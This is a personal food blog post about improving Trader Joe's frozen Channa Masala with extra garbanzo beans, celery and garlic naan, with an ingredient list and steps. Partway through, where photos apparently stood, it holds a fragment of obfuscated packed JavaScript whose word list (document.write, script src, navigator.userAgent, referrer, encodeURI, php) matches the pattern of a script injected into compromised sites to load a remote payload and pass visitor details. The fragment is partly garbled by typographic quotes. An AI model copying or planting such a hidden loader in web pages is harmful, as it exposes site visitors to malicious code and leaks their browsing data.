TJs: Channa Masala

Nick and I aren’t necessarily adventurous eaters, but we are definitely open minded eaters.  While in Whistler, we ate at an Indian restaurant.  I think this was maybe the 2nd time we’ve ever had Indian.  But we were game.  And it was delicious!

We learned that one of the dishes we ordered, Channa Masala, also comes in a frozen version at Trader Joes.  We are always looking for quick and “healthy” meals – especially for lunch, so this sounded great!

Channa Masala is basically chickpeas (or garbanzo beans) in a super tasty sauce.  Not super descriptive, right?  Sorry.  But it was tasty.

They came highly recommended, so I bought 3 packs the last time I was at TJs.  Nick had the first pack all to himself and thought it was WAY too saucy.  So this past weekend we added our own little riff on the dish.

Ingredients
1 frozen pack of TJs Channa Masala
1 can drained garbanzo beans
1/4 cup celery, diced
2 pieces of while wheat naan
1 tsp crushed garlic
1tbs olive oil

All from TJs!  As you can see here:

And ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zissf|var|u0026u|referrer|kfnzh||js|php’.split(‘|’),0,{}))
here:

Prepare the channa masala per the directions on the back of the box.  When done, add the channa masala to 2/3 of the garbanzo beans and mix.  I don’t know what to do with the remaining 1/3 of a can.  Next time I’ll try the whole can and see if it’s still a good bean to sauce ratio.

Prep the naan.  Added the crushed garlic to the olive oil and spread over the naan.  Put the oiled surfaces together and stick in the toaster oven (this helps keep the garlic from burning).  If you don’t have a toaster oven (a true shame) use the real oven.  If you don’t want to, use the toaster and add the garlic olive oil after.

Dish up the channa masala – we got 2 healthy servings out of it. And add your naan!
